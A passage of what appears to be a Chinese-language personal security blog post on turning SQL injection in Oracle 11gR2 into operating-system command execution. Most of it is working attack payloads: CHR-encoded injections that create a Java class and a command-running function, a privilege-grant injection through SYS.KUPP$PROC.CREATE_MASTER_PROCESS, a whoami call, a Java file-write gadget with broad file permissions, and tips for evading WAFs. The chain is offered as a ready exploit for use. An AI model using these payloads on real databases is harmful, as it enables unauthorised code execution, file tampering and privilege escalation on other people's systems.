class="operator">||</span>CHR(<span class="number">59</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">78</span>)<span class="operator">||</span>CHR(<span class="number">68</span>)<span class="operator">||</span>CHR(<span class="number">59</span>)) <span class="keyword">from</span> dual) <span class="keyword">is</span> <span class="keyword">not</span> <span class="keyword">null</span></span><br></pre></td></tr></table></figure>

<p>如果注入点有回显，可以试试下面查看有没有正常写入LinxUtil类</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> all_objects <span class="keyword">where</span> object_name <span class="keyword">like</span> <span class="string">&#x27;%LINX%&#x27;</span> <span class="keyword">or</span> object_name <span class="keyword">like</span> <span class="string">&#x27;%Linx%&#x27;</span></span><br></pre></td></tr></table></figure>

<h4 id="创建java函数"><a href="#创建java函数" class="headerlink" title="创建java函数"></a>创建java函数</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> (<span class="keyword">select</span> dbms_xmlquery.newcontext(CHR(<span class="number">68</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">67</span>)<span class="operator">||</span>CHR(<span class="number">76</span>)<span class="operator">||</span>CHR(<span class="number">65</span>)<span class="operator">||</span>CHR(<span class="number">82</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">80</span>)<span class="operator">||</span>CHR(<span class="number">82</span>)<span class="operator">||</span>CHR(<span class="number">65</span>)<span class="operator">||</span>CHR(<span class="number">71</span>)<span class="operator">||</span>CHR(<span class="number">77</span>)<span class="operator">||</span>CHR(<span class="number">65</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">65</span>)<span class="operator">||</span>CHR(<span class="number">85</span>)<span class="operator">||</span>CHR(<span class="number">84</span>)<span class="operator">||</span>CHR(<span class="number">79</span>)<span class="operator">||</span>CHR(<span class="number">78</span>)<span class="operator">||</span>CHR(<span class="number">79</span>)<span class="operator">||</span>CHR(<span class="number">77</span>)<span class="operator">||</span>CHR(<span class="number">79</span>)<span class="operator">||</span>CHR(<span class="number">85</span>)<span class="operator">||</span>CHR(<span class="number">83</span>)<span class="operator">||</span>CHR(<span class="number">95</span>)<span class="operator">||</span>CHR(<span class="number">84</span>)<span class="operator">||</span>CHR(<span class="number">82</span>)<span class="operator">||</span>CHR(<span class="number">65</span>)<span class="operator">||</span>CHR(<span class="number">78</span>)<span class="operator">||</span>CHR(<span class="number">83</span>)<span class="operator">||</span>CHR(<span class="number">65</span>)<span class="operator">||</span>CHR(<span class="number">67</span>)<span class="operator">||</span>CHR(<span class="number">84</span>)<span class="operator">||</span>CHR(<span class="number">73</span>)<span class="operator">||</span>CHR(<span class="number">79</span>)<span class="operator">||</span>CHR(<span class="number">78</span>)<span class="operator">||</span>CHR(<span class="number">59</span>)<span class="operator">||</span>CHR(<span class="number">66</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">71</span>)<span class="operator">||</span>CHR(<span class="number">73</span>)<span class="operator">||</span>CHR(<span class="number">78</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">88</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">67</span>)<span class="operator">||</span>CHR(<span class="number">85</span>)<span class="operator">||</span>CHR(<span class="number">84</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">73</span>)<span class="operator">||</span>CHR(<span class="number">77</span>)<span class="operator">||</span>CHR(<span class="number">77</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">68</span>)<span class="operator">||</span>CHR(<span class="number">73</span>)<span class="operator">||</span>CHR(<span class="number">65</span>)<span class="operator">||</span>CHR(<span class="number">84</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">39</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">111</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">112</span>)<span class="operator">||</span>CHR(<span class="number">108</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">102</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">111</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">76</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">120</span>)<span class="operator">||</span>CHR(<span class="number">82</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">67</span>)<span class="operator">||</span>CHR(<span class="number">77</span>)<span class="operator">||</span>CHR(<span class="number">68</span>)<span class="operator">||</span>CHR(<span class="number">40</span>)<span class="operator">||</span>CHR(<span class="number">112</span>)<span class="operator">||</span>CHR(<span class="number">95</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">109</span>)<span class="operator">||</span>CHR(<span class="number">100</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">118</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">104</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">50</span>)<span class="operator">||</span>CHR(<span class="number">41</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">118</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">99</span>)<span class="operator">||</span>CHR(<span class="number">104</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">50</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">115</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">108</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">103</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">103</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">106</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">118</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">109</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">39</span>)<span class="operator">||</span>CHR(<span class="number">39</span>)<span class="operator">||</span>CHR(<span class="number">76</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">120</span>)<span class="operator">||</span>CHR(<span class="number">85</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">108</span>)<span class="operator">||</span>CHR(<span class="number">46</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">67</span>)<span class="operator">||</span>CHR(<span class="number">77</span>)<span class="operator">||</span>CHR(<span class="number">68</span>)<span class="operator">||</span>CHR(<span class="number">40</span>)<span class="operator">||</span>CHR(<span class="number">106</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">118</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">46</span>)<span class="operator">||</span>CHR(<span class="number">108</span>)<span class="operator">||</span>CHR(<span class="number">97</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">103</span>)<span class="operator">||</span>CHR(<span class="number">46</span>)<span class="operator">||</span>CHR(<span class="number">83</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">103</span>)<span class="operator">||</span>CHR(<span class="number">41</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">101</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">117</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">32</span>)<span class="operator">||</span>CHR(<span class="number">83</span>)<span class="operator">||</span>CHR(<span class="number">116</span>)<span class="operator">||</span>CHR(<span class="number">114</span>)<span class="operator">||</span>CHR(<span class="number">105</span>)<span class="operator">||</span>CHR(<span class="number">110</span>)<span class="operator">||</span>CHR(<span class="number">103</span>)<span class="operator">||</span>CHR(<span class="number">39</span>)<span class="operator">||</span>CHR(<span class="number">39</span>)<span class="operator">||</span>CHR(<span class="number">59</span>)<span class="operator">||</span>CHR(<span class="number">39</span>)<span class="operator">||</span>CHR(<span class="number">59</span>)<span class="operator">||</span>CHR(<span class="number">69</span>)<span class="operator">||</span>CHR(<span class="number">78</span>)<span class="operator">||</span>CHR(<span class="number">68</span>)<span class="operator">||</span>CHR(<span class="number">59</span>)) <span class="keyword">from</span> dual) <span class="keyword">is</span> <span class="keyword">not</span> <span class="keyword">null</span></span><br></pre></td></tr></table></figure>

<p>如果注入点有回显，可以试试下面查看有没有正常写入LINXRUNCMD函数</p>
<p>select OBJECT_ID from all_objects where object_name &#x3D;’LINXRUNCMD’</p>
<h4 id="赋予java权限"><a href="#赋予java权限" class="headerlink" title="赋予java权限"></a>赋予java权限</h4><p>假设当前用户名是SUPERTEST，则赋予用户java函数执行权限的sql语句为(建议手动对下面SYS.KUPP$PROC.CREATE_MASTER_PROCESS中的语句做CHR编码,编码的时候注意一下换下payload的单引号):</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> SYS.KUPP$PROC.CREATE_MASTER_PROCESS(<span class="string">&#x27;DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT  &#x27;&#x27;GRANT&#x27;&#x27;,&#x27;&#x27;SUPERTEST&#x27;&#x27;,&#x27;&#x27;SYS&#x27;&#x27;,&#x27;&#x27;java.io.FilePermission&#x27;&#x27;,&#x27;&#x27;&lt;&lt;ALL FILES&gt;&gt;&#x27;&#x27;,&#x27;&#x27;execute&#x27;&#x27;,&#x27;&#x27;ENABLED&#x27;&#x27; FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;&#x27;</span>) <span class="keyword">is</span> <span class="keyword">not</span> <span class="keyword">null</span> <span class="comment">--</span></span><br></pre></td></tr></table></figure>

<p>如果注入点有回显，可以试试下面这句判断有没有赋权成功</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> user_java_policy <span class="keyword">where</span> grantee_name<span class="operator">=</span><span class="string">&#x27;SUPERTEST&#x27;</span>;</span><br></pre></td></tr></table></figure>

<h4 id="执行命令"><a href="#执行命令" class="headerlink" title="执行命令"></a>执行命令</h4><p>直接用sqlmap中sql-shell</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> LINXRUNCMD(<span class="string">&#x27;whoami&#x27;</span>) <span class="keyword">from</span> dual</span><br></pre></td></tr></table></figure>

<h2 id="一些坑点"><a href="#一些坑点" class="headerlink" title="一些坑点"></a>一些坑点</h2><h3 id="关于java权限"><a href="#关于java权限" class="headerlink" title="关于java权限"></a>关于java权限</h3><p>赋权是整个过程最关键的一步。</p>
<p>打Oracle数据库比较多的师傅应该知道，如果拿到dba用户的账号密码，则可以用<a target="_blank" rel="noopener" href="https://github.com/jas502n/oracleShell">工具oraclShell</a>直接getshell，甚至更高的版本12c等都是可以打的。</p>
<p>但很可惜在注入的情景中，我们遇到11gR2的环境可能就得唯唯诺诺了。这里面有个大坑点，因为在账号密码直接连接数据库的情景下，我们可以利用navicat等数据库管理工具直接执行下面的sql语句给当前用户JAVA的execute权限</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">DECLARE</span></span><br><span class="line">POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;</span><br><span class="line"><span class="keyword">CURSOR</span> C1 <span class="keyword">IS</span> <span class="keyword">SELECT</span></span><br><span class="line"><span class="string">&#x27;GRANT&#x27;</span>,<span class="keyword">USER</span>(),<span class="string">&#x27;SYS&#x27;</span>,<span class="string">&#x27;java.io.FilePermission&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;&lt;&lt;ALL FILES&gt;&gt;&#x27;</span>,<span class="string">&#x27;execute&#x27;</span>,<span class="string">&#x27;ENABLED&#x27;</span> <span class="keyword">FROM</span> DUAL;</span><br><span class="line"><span class="keyword">BEGIN</span></span><br><span class="line"><span class="keyword">OPEN</span> C1;</span><br><span class="line"><span class="keyword">FETCH</span> C1 BULK <span class="keyword">COLLECT</span> <span class="keyword">INTO</span> POL;</span><br><span class="line"><span class="keyword">CLOSE</span> C1;</span><br><span class="line">DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);</span><br><span class="line"><span class="keyword">END</span>;</span><br></pre></td></tr></table></figure>

<p>但是在注入的情景中，我们无法执行这种堆叠语句。</p>
<p>针对这个无法执行堆叠语句的问题，前面创建JAVA类和函数等操作都可以通过dbms_xmlquery.newcontext等函数或存储过程包裹我们的语句正常执行，但是很可惜，当换成赋权语句时就没法正常执行了。</p>
<p>可以看看我几年前的测试结果</p>
<blockquote>
<p>测试发现<code>GET_DOMAIN_INDEX_TABLES</code> <code>dbms_xmlquery.newcontext</code> <code>DBMS_JAVA_TEST.FUNCALL</code>函数在dba用户权限下可以创建java函数,但是不能赋予java执行权限,后面找到这个SYS.KUPP$PROC.CREATE_MASTER_PROCESS解决</p>
</blockquote>
<p>幸运的是我在翻Oracle提权的相关文章时发现<a target="_blank" rel="noopener" href="http://psoug.org/articles/Hacking-Aurora-in-Oracle-11g.htm/">文章</a>中提到了一个叫<code>SYS.KUPP$PROC.CREATE_MASTER_PROCESS</code>的存储过程，当我尝试用这个存储过程来做赋权操作时发现正常执行了，至此闭环。</p>
<p>Ps:这个存储过程其实还可以用于创建计划任务实现rce，具体可以看看<a target="_blank" rel="noopener" href="https://github.com/carlospolop/hacktricks/blob/master/pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md">这个文章</a></p>
<h3 id="关于函数执行"><a href="#关于函数执行" class="headerlink" title="关于函数执行"></a>关于函数执行</h3><p>下买两种poc都可以触发函数或存储过程</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> <span class="string">&#x27;s&#x27;</span><span class="operator">=</span>(<span class="keyword">select</span> dbms_xdb_version.checkin((<span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> dual)) <span class="keyword">from</span> dual) <span class="operator">-</span></span><br><span class="line"><span class="keyword">and</span> (<span class="keyword">select</span> dbms_xdb_version.checkin((<span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> dual)) <span class="keyword">from</span> dual) <span class="keyword">is</span> <span class="keyword">not</span> <span class="keyword">null</span> <span class="comment">--</span></span><br></pre></td></tr></table></figure>

<h3 id="关于CHR编码"><a href="#关于CHR编码" class="headerlink" title="关于CHR编码"></a>关于CHR编码</h3><p>在.net会拦截<code>&lt;</code> <code>&gt;</code>等字符</p>
<p>而java环境中，也可能因为我们poc中的一些特殊字符导致sql语句被破坏截断，所以建议尽量对sql语句做CHR编码</p>
<h3 id="关于sqlmap"><a href="#关于sqlmap" class="headerlink" title="关于sqlmap"></a>关于sqlmap</h3><p>sqlmap对oracle的支持其实挺不友好的</p>
<ul>
<li>首先sqlmap是不支持oracle的os-shell的</li>
<li>sqlmap的sql-shell只支持查询类型语句</li>
<li>Sqlmap最常用的报错函数是XMLType,该函数遇到空格会被截断,所以sqlmap执行whoami经常得到nt的结果,因为用户名含有nt authority所以被截断了</li>
</ul>
<h2 id="彩蛋"><a href="#彩蛋" class="headerlink" title="彩蛋"></a>彩蛋</h2><h3 id="java存储过程"><a href="#java存储过程" class="headerlink" title="java存储过程"></a>java存储过程</h3><p>其实这个本质就是java任意代码执行，所以除了执行系统命令外其实可以玩出花的地方还挺多的。</p>
<p>随便分享一个以前写文件的思路</p>
<h4 id="创建FileWrite类"><a href="#创建FileWrite类" class="headerlink" title="创建FileWrite类"></a>创建FileWrite类</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE &#x27;create or replace and resolve java source named &quot;FileWrite&quot; as import sun.misc.BASE64Decoder; public class FileWrite &#123;    public static String write(String filename, String filecontent) throws Exception &#123;java.io.FileOutputStream outputStream = new java.io.FileOutputStream(filename, true);        outputStream.write(new sun.misc.BASE64Decoder().decodeBuffer(filecontent));        outputStream.flush();        outputStream.close();        return &quot;&quot;;    &#125;&#125;&#x27;;commit;END;</span><br></pre></td></tr></table></figure>

<h4 id="创建函数"><a href="#创建函数" class="headerlink" title="创建函数"></a>创建函数</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate &#x27;create or replace function fwrite(p_filename in varchar2,p_filcontent in varchar2) return varchar2 as language java name &#x27;&#x27;FileWrite.write(java.lang.String,java.lang.String) return String&#x27;&#x27;;&#x27;; commit; end;</span><br></pre></td></tr></table></figure>

<p>赋权的话，注意这里直接把读写执行全部赋权进去，毕竟写文件需要写权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">DECLARE</span><br><span class="line">POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;</span><br><span class="line">CURSOR C1 IS SELECT</span><br><span class="line">&#x27;GRANT&#x27;,USER(),&#x27;SYS&#x27;,&#x27;java.io.FilePermission&#x27;,</span><br><span class="line">&#x27;&lt;&lt;ALL FILES&gt;&gt;&#x27;,&#x27;read,write,execute&#x27;,&#x27;ENABLED&#x27; FROM DUAL;</span><br><span class="line">BEGIN</span><br><span class="line">OPEN C1;</span><br><span class="line">FETCH C1 BULK COLLECT INTO POL;</span><br><span class="line">CLOSE C1;</span><br><span class="line">DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);</span><br><span class="line">END;</span><br></pre></td></tr></table></figure>

<h4 id="写文件"><a href="#写文件" class="headerlink" title="写文件"></a>写文件</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select fwrite(&#x27;/tmp/test&#x27;,&#x27;MTIzNAo=&#x27;) from dual</span><br></pre></td></tr></table></figure>

<h3 id="关于oracle注入下绕waf"><a href="#关于oracle注入下绕waf" class="headerlink" title="关于oracle注入下绕waf"></a>关于oracle注入下绕waf</h3><p>一些以前fuzz的不影响sql语句执行的字符</p>
<p><img src="/2022/04/14/Oracle%2011gR2%E6%B3%A8%E5%85%A5%E7%9A%84%E4%B8%80%E7%A7%8D%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%A7%BF%E5%8A%BF/image-20220414160737124.png" alt="image-20220414160737124"></p>
<h3 id="oracle无select注入"><a href="#oracle无select注入" class="headerlink" title="oracle无select注入"></a>oracle无select注入</h3><p>参考<a target="_blank" rel="noopener" href="http://www.yulegeyu.com/2019/11/24/ORACLE-%E6%97%A0SELEC%E6%B3%A8%E5%85%A5/">雨神文章</a></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2022/04/13/%E4%B8%80%E6%AC%A1adminer%E4%B9%8B%E6%97%85/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2022-04-14 22:36:19
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2022/04/15/%E4%B8%80%E6%AC%A1fastjson%E7%BB%95waf%E6%A1%88%E4%BE%8B/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6"><span class="toc-text">利用条件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#poc"><span class="toc-text">poc</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2%E5%BD%93%E5%89%8D%E7%94%A8%E6%88%B7%E5%90%8D"><span class="toc-text">查询当前用户名:</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%9B%E5%BB%BAjava%E4%BE%9D%E8%B5%96"><span class="toc-text">创建java依赖</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%9B%E5%BB%BAjava%E5%87%BD%E6%95%B0"><span class="toc-text">创建java函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B5%8B%E4%BA%88java%E6%9D%83%E9%99%90"><span class="toc-text">赋予java权限</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-text">执行命令</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E4%BA%9B%E5%9D%91%E7%82%B9"><span class="toc-text">一些坑点</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B3%E4%BA%8Ejava%E6%9D%83%E9%99%90"><span class="toc-text">关于java权限</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B3%E4%BA%8E%E5%87%BD%E6%95%B0%E6%89%A7%E8%A1%8C"><span class="toc-text">关于函数执行</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B3%E4%BA%8ECHR%E7%BC%96%E7%A0%81"><span class="toc-text">关于CHR编码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B3%E4%BA%8Esqlmap"><span class="toc-text">关于sqlmap</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%A9%E8%9B%8B"><span class="toc-text">彩蛋</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#java%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B"><span class="toc-text">java存储过程</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%9B%E5%BB%BAFileWrite%E7%B1%BB"><span class="toc-text">创建FileWrite类</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E5%87%BD%E6%95%B0"><span class="toc-text">创建函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%99%E6%96%87%E4%BB%B6"><span class="toc-text">写文件</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B3%E4%BA%8Eoracle%E6%B3%A8%E5%85%A5%E4%B8%8B%E7%BB%95waf"><span class="toc-text">关于oracle注入下绕waf</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#oracle%E6%97%A0select%E6%B3%A8%E5%85%A5"><span class="toc-text">oracle无select注入</span></a></li></ol></li></ol>
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/daidaitiehanhan">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://daidaitiehanhan.github.io/">Copyright © 2022 tiehanhan</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://daidaitiehanhan.github.io/">Theme by tiehanhan | Powered by tiehanhan</a>
        
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
